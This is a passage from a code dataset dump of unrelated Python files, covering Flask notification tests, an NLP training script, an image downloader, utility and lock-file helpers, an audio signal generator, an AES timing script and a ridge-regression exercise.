access a non-existent notification\n '''\n \n response = self.client.get(\n 'api/v1/notifications/obegiawr',\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 404)\n self.assertEqual(generated_response['message'], 'Notification does not exist!')\n \n def test_request_does_not_contain_headers_patch_single_notification(self):\n response = self.client.patch('/api/v1/notifications/-test_notif_id')\n response_data = json.loads(response.data)\n self.assert400(response)\n self.assertEqual(response_data['data']['message'],\n 'Bad request. 
Header does not contain authorization'\n ' token')\n \n def test_user_patch_single_notification_read_status_to_True(self):\n notif = Notification.query_redis(self.regular_user.id, self.notification1.id)\n self.assertTrue(not notif['read'])\n response = self.client.patch(\n 'api/v1/notifications/{}'.format(self.notification1.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(generated_response['data']['notification']['read'])\n \n def test_user_patch_single_notification_read_status_to_False(self):\n notif = Notification.query_redis(self.regular_user.id, self.notification3.id)\n self.assertTrue(notif['read'])\n response = self.client.patch(\n 'api/v1/notifications/{}'.format(self.notification3.id),\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(not generated_response['data']['notification']['read'])\n\n def test_user_patch_all_notification_read_status_to_True(self):\n notifs = Notification.query_redis(self.regular_user.id)\n self.assertTrue(notifs[0]['read'])\n self.assertTrue(not notifs[1]['read'])\n self.assertTrue(not notifs[2]['read'])\n response = self.client.patch(\n 'api/v1/notifications',\n content_type='application/json',\n headers=self.regular_header\n )\n generated_response = json.loads(response.data)\n self.assertEqual(response.status_code, 200)\n self.assertTrue(generated_response['data']['notifications'][0]['read'])\n self.assertTrue(generated_response['data']['notifications'][1]['read'])\n self.assertTrue(generated_response['data']['notifications'][2]['read'])\n\n def test_contribution_approved_notification(self):\n user_notifications_before = Notification.get_count(self.regular_user.id)\n\n data = {\"status\": \"approved\"}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n\n user_notifications_after = Notification.get_count(self.regular_user.id)\n\n self.assertTrue(user_notifications_after > user_notifications_before)\n\n def test_contribution_archived_notification(self):\n user_notifications_before = Notification.get_count(self.regular_user.id)\n\n data = {\"status\": 'archived'}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n\n user_notifications_after = Notification.get_count(self.regular_user.id)\n\n self.assertTrue(user_notifications_after > user_notifications_before)\n\n @patch('flask_sse.sse.publish')\n def test_contribution_approved_notification_stream(self, mock):\n data = {\"status\": \"approved\"}\n response = self.client.put(\n f'api/v1/contributions/{self.contribution.id}',\n data=json.dumps(data),\n content_type='application/json', headers=self.admin_header)\n self.assertTrue(mock.called)\n","sub_path":"test/api/views/test_notifications.py","file_name":"test_notifications.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261226263","text":"\n\nfrom xai.brain.wordbase.nouns._violation import _VIOLATION\n\n#calss header\nclass _VIOLATIONS(_VIOLATION, ):\n\tdef __init__(self,): \n\t\t_VIOLATION.__init__(self)\n\t\tself.name = \"VIOLATIONS\"\n\t\tself.specie = 
'nouns'\n\t\tself.basic = \"violation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_violations.py","file_name":"_violations.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"160626060","text":"# -*- coding: utf-8 -*-\n\n\nimport argparse\nimport sys\nimport random\nimport copy\n\nimport torch\nimport numpy\n\nfrom nlp_tasks.absa.utils import argument_utils\nfrom nlp_tasks.absa.mining_opinions.sequence_labeling import sequence_labeling_train_templates as templates\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--current_dataset', help='dataset name', default='RealASOTripletRest16', type=str)\nparser.add_argument('--task_name', help='task name', default='ate', type=str)\nparser.add_argument('--data_type', help='data type', default='common', type=str)\nparser.add_argument('--model_name', help='model name', default='NerLstm', type=str)\nparser.add_argument('--timestamp', help='timestamp', default=int(1571400646), type=int)\nparser.add_argument('--train', help='if train a new model', default=False, type=argument_utils.my_bool)\nparser.add_argument('--evaluate', help='evaluate', default=False, type=argument_utils.my_bool)\nparser.add_argument('--predict', help='predict text', default=False, type=argument_utils.my_bool)\nparser.add_argument('--predict_test', help='predict test set', default=True, type=argument_utils.my_bool)\nparser.add_argument('--epochs', help='epochs', default=100, type=int)\nparser.add_argument('--batch_size', help='batch_size', default=32, type=int)\nparser.add_argument('--patience', help='patience', default=10, type=int)\nparser.add_argument('--visualize_attention', help='visualize attention', default=False, type=argument_utils.my_bool)\nparser.add_argument('--embedding_filepath', help='embedding filepath',\n default='D:\\program\\word-vector\\glove.840B.300d.txt', type=str)\nparser.add_argument('--embed_size', help='embedding dim', default=300, type=int)\nparser.add_argument('--seed', default=776, type=int)\nparser.add_argument('--repeat', default='0', type=str)\nparser.add_argument('--device', default=None, type=str)\nparser.add_argument('--gpu_id', default='0', type=str)\nparser.add_argument('--position', default=False, type=argument_utils.my_bool)\nparser.add_argument('--position_embeddings_dim', help='position embeddings dim', default=32, type=int)\nparser.add_argument('--debug', default=False, type=argument_utils.my_bool)\nparser.add_argument('--early_stopping_by_batch', default=False, type=argument_utils.my_bool)\n\nparser.add_argument('--crf', help='True for crf tagger, False for simple tagger', default=False,\n type=argument_utils.my_bool)\n\nparser.add_argument('--fixed_bert', default=True, type=argument_utils.my_bool)\nparser.add_argument('--learning_rate_in_bert', default=2e-5, type=float)\nparser.add_argument('--l2_in_bert', default=0.00001, type=float)\nparser.add_argument('--lstm_layer_num_in_bert', default=1, type=int)\nparser.add_argument('--bert_file_path', help='bert_file_path',\n default=r'D:\\program\\word-vector\\bert-base-uncased.tar.gz', type=str)\nparser.add_argument('--bert_vocab_file_path', help='bert_vocab_file_path',\n default=r'D:\\program\\word-vector\\uncased_L-12_H-768_A-12\\vocab.txt', type=str)\nparser.add_argument('--max_len', help='max length', default=100, type=int)\n\nparser.add_argument('--include_conflict', default=False, type=argument_utils.my_bool)\n\nargs = parser.parse_args()\n\nargs.device = 
torch.device('cuda' if torch.cuda.is_available() else 'cpu') if args.device is None else torch.device(args.device)\ngpu_ids = args.gpu_id.split(',')\nif len(gpu_ids) == 1:\n args.gpu_id = -1 if int(gpu_ids[0]) == -1 else 0\nelse:\n args.gpu_id = list(range(len(gpu_ids)))\n\n\nconfiguration = args.__dict__\n\nif configuration['seed'] is not None:\n random.seed(configuration['seed'])\n numpy.random.seed(configuration['seed'])\n torch.manual_seed(configuration['seed'])\n torch.cuda.manual_seed(configuration['seed'])\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\nmodel_name_complete_prefix = 'model_name_{model_name}-include_conflict_{include_conflict}'.format_map(configuration)\n\nconfiguration_for_this_repeat = copy.deepcopy(configuration)\nconfiguration_for_this_repeat['model_name_complete'] = '%s.%s' % (model_name_complete_prefix, args.repeat)\n\nmodel_name = configuration['model_name']\nif model_name in ['NerLstm']:\n template = templates.NerLstm(configuration_for_this_repeat)\nelif model_name in ['NerBert']:\n template = templates.NerBert(configuration_for_this_repeat)\nelse:\n raise NotImplementedError(model_name)\n\nif configuration_for_this_repeat['train']:\n template.train()\n\nif configuration_for_this_repeat['evaluate']:\n template.evaluate()\n\nif configuration_for_this_repeat['predict_test']:\n output_filepath = template.model_dir + 'result_of_predicting_test.txt'\n print('result_of_predicting_test:%s ' % output_filepath)\n template.predict_test(output_filepath, only_error=False)\n\nif configuration_for_this_repeat['predict']:\n texts = [\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n {\n 'words': 'I love the drinks , esp lychee martini , and the food is also VERY good .',\n },\n ]\n texts_preprocessed = []\n for text in texts:\n text_preprocessed = {\n 'words': text['words'].split(' ')\n }\n texts_preprocessed.append(text_preprocessed)\n result = template.predict(texts_preprocessed)\n print(result)\n\n","sub_path":"nlp_tasks/absa/mining_opinions/sequence_labeling/ate_bootstrap.py","file_name":"ate_bootstrap.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200262940","text":"import pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\n\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\n\n\n \ndf = pd.read_excel('/Users/jing/Downloads/00002_NEW IN_WOMAN_excel.xlsx', sheetname='Products')\nprint(\"Column headings:\")\n\n\nprint(len(df['Urls to images (spaced)']))\n\nimages = df['Urls to images (spaced)']\nsku = df['Sku']\n\nprint(len(images))\nprint(len(sku))\n\n\nfor i in range(len(images)):\n\turl = images[i].split()[0]\n\tname = sku[i]\n\tprint(i, name, url)\n\t\n\tresponse = requests.get(url)\n\timg = Image.open(BytesIO(response.content))\n\timg.save(\"/Users/jing/Desktop/skuimages/\" + name + \".png\", \"png\")\n\n\n","sub_path":"ml method/get_all_images.py","file_name":"get_all_images.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"148108827","text":"import yaml\n\n\nclass Config:\n def __init__(self, config_file):\n with open(config_file, 'r') as yml:\n config = yaml.load(yml)\n self.model_obj_path = config[\"model_obj_path\"]\n self.model_scene_path = 
config[\"model_scene_path\"]\n self.sqlite_path = config[\"sqlite_path\"]\n self.ngt_obj_path = config[\"ngt_obj_path\"].encode('utf-8')\n self.ngt_scene_path = config[\"ngt_scene_path\"].encode('utf-8')\n\n self.images_dir = config[\"images_dir\"]\n self.tumnail_dir = config[\"tumnail_dir\"]\n self.static_dir = config[\"static_dir\"]\n","sub_path":"anealing/samples/image_search/scripts/app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487464048","text":"import sys\nfrom math import ceil, log\ninput = sys.stdin.readline\n\nN , M = map(int,input().split())\nk = ceil(log(N,2))\ntreesize = (2**(k+1)) -1\nt = [ 100001 for i in range(treesize)]\nx = (2**k)\n\nfor i in range(x-1, N+x-1):\n t[i] = int(input())\n\nfor i in range( treesize - 2, 0 , -2 ):\n t[i//2] = min(t[i],t[i+1])\n\ndef func(a,b):\n global t\n if a == b:\n return t[a]\n else:\n if a % 2 == 0 and b % 2 == 1:\n if b - a == 1:\n return min( t[a] , t[b] )\n else:\n return min ( t[a], t[b], func(a+1,b-1) ) \n\n if a % 2 == 0 and b % 2 == 0:\n return min ( t[a] , func(a+1,b) )\n\n if a % 2 == 1 and b % 2 == 0:\n return func(a//2, b//2-1)\n \n if a % 2 == 1 and b % 2 == 1:\n return min( t[b] ,func(a,b-1) )\n\nfor i in range(M):\n a , b = map(int,input().split())\n ra , rb = x - 2 + a, x + b - 2\n print(func(ra,rb))\n","sub_path":"BoJ/BoJ.10868.py","file_name":"BoJ.10868.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147421455","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated at 2019-03-08 09:33\n\n@author: Haitao Liu; htyeim@gmail.com\n\"\"\"\n\nimport os\nimport glob\nimport pandas as pd\nfrom astropy.time import Time as ATime\nimport time\nimport subprocess\n\n\ndef FUN_run_command(command, timeout=60.0, shell=False, try_N=2, need_print=True):\n if command == \"\":\n return ''\n if need_print:\n print('\\r{} start timeout={}: {}'.format(pd.Timestamp.now(), timeout, command, ),\n end=' ', flush=True)\n if shell:\n command_str = command\n # result = subprocess.run(\n # command, shell=shell, check=True,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.STDOUT,\n # timeout=timeout)\n else:\n command_str = command.split(' ')\n # if len(command_str) == 1:\n # pass\n # else:\n # command_str = [command_str[0], ' '.join(command_str[1:])]\n try_i = 0\n result = None\n while try_i < try_N:\n try_i += 1\n try:\n result = subprocess.run(\n command_str, shell=shell, check=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n timeout=timeout)\n break\n except:\n # return None\n print()\n pass\n if result is None:\n return None\n if need_print:\n print('\\r end {} {}'.format(command_str, result.returncode),\n end='\\r', flush=True)\n return result.stdout\n pass\n\n\n# datetime\ndef MJD2datetime(mjd):\n dt = ATime(mjd, format='mjd').datetime\n return dt\n\n\ndef get_path_doy(path_root='', year=2017, doy=1):\n return '{}/{:0>4d}/{:0>3d}'.format(path_root, year, doy)\n\n\n# range\n\ndef get_datetime_range(dt, begin=-0.5, end=1.5):\n dt = pd.Timestamp(dt)\n return [dt + pd.Timedelta(hours=i) for i in [begin, end]]\n\n\n# folder\n\nclass Lock_file():\n def __init__(self, filename=None):\n self.lock_file = filename\n pass\n\n def remove_lock_file(self):\n lock_file = self.lock_file\n if lock_file is None:\n print('lock file is None.')\n return\n if os.path.isfile(lock_file):\n 
os.system('rm {}'.format(lock_file))\n else:\n print('lock file not exist?')\n remove_empty_folder(os.path.dirname(lock_file))\n\n def add_lock_file(self, filename=None, replace=False):\n if filename is None:\n filename = self.lock_file\n if filename is None:\n print(\"need to specify the lock filename!\")\n return None\n start_time = pd.Timestamp.now()\n try_i = 0\n wait_seconds = 66.6\n while True:\n if replace:\n break\n if os.path.isfile(filename):\n print(\"\\r waiting from {} . {} {} s..file existed {}\".format(\n start_time, try_i, wait_seconds, filename, ), end=' ', flush=True)\n try_i += 1\n time.sleep(66.6)\n continue\n break\n self.lock_file = filename\n check_folder(os.path.dirname(filename))\n with open(filename, 'w') as f:\n f.write('{} UTC'.format(pd.Timestamp.utcnow()))\n return filename\n\n\ndef check_folder(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef remove_empty_folder(path=None, removeRoot=True, depth=0):\n if depth < 0:\n return\n if path is None:\n return\n 'Function to remove empty folders'\n if not os.path.isdir(path):\n return\n # remove empty subfolders\n files = os.listdir(path)\n if len(files):\n for f in files:\n fullpath = os.path.join(path, f)\n if os.path.isdir(fullpath):\n remove_empty_folder(fullpath, depth=depth - 1)\n\n # if folder empty, delete it\n if os.path.isdir(path):\n files = os.listdir(path)\n if len(files) == 0 and removeRoot:\n print(\"Removing empty folder: {}\".format(path))\n os.rmdir(path)\n remove_empty_folder(os.path.dirname(os.path.normpath(path)))\n","sub_path":"htyeimpg/Funs.py","file_name":"Funs.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"515314392","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('authors', '0055_auto_20151007_1259'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='abstract',\n name='tags',\n field=models.CharField(default='default', max_length=250),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='abstract',\n name='abstract',\n field=models.TextField(help_text=b'Pasting your abstract text will help us make your work searchable.', max_length=50000),\n ),\n migrations.AlterField(\n model_name='abstract',\n name='date',\n field=models.DateTimeField(default=datetime.datetime(2015, 10, 7, 14, 24, 28, 504636)),\n ),\n ]\n","sub_path":"authors/migrations/0056_auto_20151007_1424.py","file_name":"0056_auto_20151007_1424.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"140207674","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.signal as sc\nimport simpleaudio as sa\nimport os\n\n\nN=10000 # Cantidad de períodos \ncantidad=1 # Cantidad de veces que se repite la señal\nfase = 0 # Fase de la señal en radianes\namp = 1.0 # Ampitud de la señal\nf = 1000 # Frecencia de la señal\nB = 2500 # Frecuencia de batido\nfs = 44100 # Frecuencia de muestreo en Hz, ver frecuencias soportadas de\n # la place de sonido\n\n#sec = 1 # Cuantos segundos se quiere reproducir\n\n#t = np.arange(0,sec,1/fs)\n\n#note = (2**15-1)*np.sin(2 * np.pi * B/2*(t/sec) *t) #sweept\n\n#steps=10\n#note=np.array([])\n#for i in range(steps):\n# note=np.append(note,[(2**15-1)*np.sin(2 * np.pi * B*(i/steps) *t)])\n\n#note = 
(2**15-1)*np.sin(2 * np.pi * B * t) # Señal senoidal a reproducir\n#note = (2**15-1)*sc.sawtooth(2 * np.pi * f * t) # Señal triangular a reproducir\n#note = (2**15-1)*sc.square(2 * np.pi * f * t) # Señal cuadrada a reproducir\n\n\n# Función senoidal\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# fase --> fase de la señal en radianes\n# Devuelve:\n# f1 --> vector de señal de la señal \n# n --> vector de tienpos de sampling \ndef senoidal(fs,f,amp,muestras,fase):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n f1=(2**15-1)*amp*np.sin(2*np.pi*f*n+fase) # Definimos el Vector de Frecuencias\n return f1,n\n\n# Función cuadrada\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# Devuelve:\n# t --> vector de valores temporales\n# senal --> vector de valores de la señal \ndef cuadrada(fs,f,amp,muestras):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n return (2**15-1)*amp*sc.square(2*np.pi*n*f),n\n\n\n\n# Función triangular\n# Parámetros:\n# fs --> fecuencia de sampleo\n# f --> frecuencia de la señal de entrada\n# amp --> amplitud del señal de 0 a 1.\n# muestras--> cantidad de veces que se repite la señal\n# Devuelve:\n# t --> vector de valores temporales\n# senal --> vector de valores de la señal\ndef triangular(fs,f,amp,muestras):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n return (2**15-1)*sc.sawtooth(2*np.pi*f*n,1),n\n\n\ndef senoidalSuma(fs,f,amp,muestras,fase,B):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n # Definimos el Vector de Frecuencias\n f1=(2**15-1)*0.7*amp*np.sin(2*np.pi*f*n+fase)+(2**15-1)*0.3*amp*np.sin(2*np.pi*B*n) \n return f1,n\n\ndef senoidalB(fs,f,amp,muestras,fase,B):\n n = np.arange(0, muestras/f, 1/fs) # Intervalo de tiempo en segundos\n f1=(2**15-1)*np.sin(2*np.pi*B/2*n*n) #sweept\n return f1,n\n\n# Grafica la señal\ndef graficar(encabezado,funcion,n,xlim):\n global f\n fig = plt.figure(1)\n plt.suptitle(encabezado)\n plt.subplots_adjust(left=0.08, bottom=0.08, right=0.98, top=0.9, wspace=0.4, hspace=0.8)\n \n s1 = fig.add_subplot(1,1,1)\n plt.title(\"Señal\")\n plt.xlabel(\"Tiempo(s)\")\n plt.ylabel(\"Amplitud\")\n plt.xlim(0,xlim)\n s1.grid(True)\n s1.plot(n,funcion,'b-')\n plt.show()\n return\n\n\ndef reproducir(note):\n audio = note.astype(np.int16) #tranforma la variable note a entero de 16bits y lo guarda en audio\n for i in range(cantidad):\n play_obj = sa.play_buffer(audio, 1, 2, fs) # sale el audio\n play_obj.wait_done() # espera que termine la linea anterior\n\n\ndef op_senoidal():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=======Señal Senoidal=========\")\n print(\"==============================\")\n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidal(fs,f,amp,N,fase)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Senoidal -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta 
=='s':\n reproducir(f1)\n return\n\ndef op_cuadrada():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=======Señal Cuadrada=========\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=cuadrada(fs,f,amp,N)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Cuadrada -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef op_triangular():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"======Señal Triangular========\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=triangular(fs,f,amp,N)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Triangular -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef op_senoidalB():\n global B\n os.system(\"clear\")\n print(\"==============================\")\n print(\"=Señal Barrido de Senoidales==\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidalB(fs,f,amp,N,fase,B)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Barrido de 2 senoidales-->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,200/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\n\ndef op_senoidalSuma():\n global f\n os.system(\"clear\")\n print(\"==============================\")\n print(\"===Señal Suma de Senoidales===\")\n print(\"==============================\") \n print(\"La frecuencia de la señal a reproducir es ={}Hz\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp)) \n f1,n=senoidalSuma(fs,f,amp,N,fase,B)\n consulta=input(\"Desea graficar la señal S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n encabezado=\"Suma de 2 senoidales -->\"+\" f=\"+str(f)+\"Hz\"+\" T=\"+str((1/f)*1000)+\"mseg\"+\" N=\"+str(N)+\" fs=\"+str(fs)+\"Hz\"+\" fase=\"+str(fase*180/np.pi)+\"º\"\n graficar(encabezado,f1,n,2/f)\n consulta=input(\"Desea reproducir la señal S o N[Enter] :\") \n if consulta=='S' or consulta =='s':\n reproducir(f1)\n return\n\ndef valores():\n global N,fs,amp,fase,cantidad,B,f\n os.system(\"clear\")\n print(\"----------------------------------------------------\") \n print(\"Los valores actuales son:\\n\")\n print(\"La frecuencia de la señal es={}\".format(f))\n print(\"La amplitud de la señal es={}\".format(amp))\n print(\"La cantidad de períodos es N={}\".format(N))\n print(\"La fase de la señal en radianes es={}*Pi 
radianes\".format(fase))\n print(\"----------------------------------------------------\") \n print(\"La frecuencia de fs={}Hz, y el ts={}seg\".format(fs,1/fs)) \n print(\"La cantidad de veces que se desea repetir es={}\".format(cantidad))\n print(\"La frecuencia de B={}Hz\".format(B))\n consulta=input(\"Desea cambiar los valores S o N[Enter] :\")\n if consulta=='S' or consulta =='s':\n valor=input(\"Ingrese la frecuencia Hz de la señal f =\")\n if valor.isdigit():\n f=int(valor)\n valor=input(\"Ingrese la amplitud de la señal entre 0 a 100% =\")\n if valor.isdigit():\n amp=float(valor)/100 \n valor=input(\"Ingrese la cantidad de períodos a visualzar N =\")\n if valor.isdigit():\n N=int(valor)\n valor=input(\"Ingrese la fase en grados( enteros) entre 0 a 360 =\")\n if valor.isdigit():\n fase=float(valor)*np.pi/180 \n valor=input(\"Ingrese la frecuencia Hz de sampling fs =\")\n if valor.isdigit():\n fs=int(valor) \n valor=input(\"Ingrese la cantidad de veces que desea repetir la señal visualizada =\")\n if valor.isdigit():\n cantidad=int(valor) \n print(\"El tiempo de sampleo es ts={}\".format(1/fs))\n valor=input(\"Ingrese la frecuencia Hz de B =\")\n if valor.isdigit():\n B=int(valor)\n input(\"Presiona cualquier tecla para continuar\")\n os.system(\"clear\")\n \n\n#================================================================\n# Inicio del programa principal\n#================================================================\nmenu=\"\"\"\nProgramas de la transformada Discreta de Fourier\nelija una opción:\n\n[1] Señal senoidal (fs,f,amp,muestras,fase)\n[2] Señal cuadrada (fs,f,amp,muestras)\n[3] Señal triangular (fs,f,amp,muestras)\n[4] Suma de frecuencias senoidames 0.7*f+0.3*B\n[5] Barrido de frecuencias senoidales de f a B\n\n[6] TBD\n[7] TBD\n[8] Seteo de frecuencia de la señal de entrada, número de muestras, frecuencia \nde sampling\n[9] Salir\n\"\"\"\n\nwhile(True):\n os.system(\"clear\")\n print(menu)\n\n opcion=input(\"Elija una opción: \")\n\n if opcion== '1':\n op_senoidal()\n elif opcion== '2':\n op_cuadrada()\n elif opcion== '3':\n op_triangular() \n elif opcion== '4':\n op_senoidalSuma()\n elif opcion== '5':\n op_senoidalB()\n elif opcion== '6':\n pass\n elif opcion== '7':\n pass\n elif opcion== '8':\n valores()\n elif opcion== '9':\n os.system(\"clear\")\n print(\"Gracias por usar el programa !!!\")\n exit (0)\n else:\n print(\"No selecionó una opción válida\\n\\r\")","sub_path":"Programas/TP2/linux/audio_gen_folino.py","file_name":"audio_gen_folino.py","file_ext":"py","file_size_in_byte":11052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356905403","text":"from drawGraph import plotGraph\nimport time as clock\nfrom secrets import token_bytes\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\nclass AES_Encryption:\n def __init__(self, number_of_byte, mode):\n self.mode = mode\n self.iv = Random.new().read(AES.block_size)\n self.key = token_bytes(number_of_byte)\n file = open('AES_keys.txt', 'r+')\n file.write(str(self.key))\n if self.mode == AES.MODE_ECB:\n self.cipher = AES.new(self.key, self.mode)\n else:\n self.cipher = AES.new(self.key, self.mode, self.iv)\n file = open('AES_plain_text.txt', 'r')\n self.plain_text = file.read()\n self.encrypted_text = ''\n self.padded_text = ''\n\n def pad_message(self, message):\n while len(message) % 16 != 0:\n message = message + ' '\n return message\n\n def encrypt(self):\n if self.mode == AES.MODE_ECB:\n self.padded_text = self.plain_text if 
len(self.plain_text) % 16 == 0 else self.pad_message(self.plain_text)\n else:\n self.padded_text = self.plain_text\n self.encrypted_text = self.cipher.encrypt(bytes(self.padded_text.encode()))\n file = open('AES_encrypted_text.txt', 'r+')\n file.write(str(self.encrypted_text))\n\n def decrypt(self):\n if self.mode == AES.MODE_CFB:\n another_cipher = AES.new(self.key, self.mode, self.iv)\n return another_cipher.decrypt(self.encrypted_text)\n return self.cipher.decrypt(self.encrypted_text)\n\n\ndef rootAES():\n data = dict()\n for i in range(2,5):\n start = clock.time()\n encryption = AES_Encryption(8*i, AES.MODE_ECB)\n encryption.encrypt()\n end = clock.time()\n key = str(8*i*8) +'_bits'\n data[key] = end - start\n return data\n\n\n\n\ndata = rootAES()\nprint(data)\nplotGraph(data,'AES Encryption Time')\n","sub_path":"AES_encryption_time.py","file_name":"AES_encryption_time.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"165348563","text":"import numpy as np\nimport matplotlib.pyplot as pl\n\ndef ridge( X, y, d2 ):\n\n A = np.dot(X.T, X)\n B = A + ( d2 * np.identity(8) )\n C = np.linalg.inv( B )\n D = np.dot( C, X.T )\n \n theta = np.dot(D, y)\n\n return theta\n\n#initialize and load data needed\nX = np.loadtxt('prostate.data')\nfig = pl.figure()\nd2 = np.logspace(-5, 10, num=100)\n\nmean_sd = []\nU,S,VT = np.linalg.svd(X, full_matrices=False)\n\n#loop through all deltas\n#for every delta\n#split data to 10 pieces, 1 test, 9 train\n#normalize data\n#get theta\n#use theta on test data (split beforehand into X_test and y_test)\n#multiply theta with X_test, answer is y_hat\n#error is between y_hat and y_test (a lil more complicated)\n#thats one error for one fold, do ten times, with other folds\n#using different batch of test and train data\n#now have 10 errors for one delta\n#compute mean for the ten errors for y axis in plot\n#get the standard deviation for the ten errors for the bar size\n#get df for x axis in plot\n#repeat for all other deltas\nfor i in xrange( d2.size ):\n #10 folds\n ten_errors = [0]*10\n for j in xrange( 10 ):\n #combine two parts of the data\n #eg. 
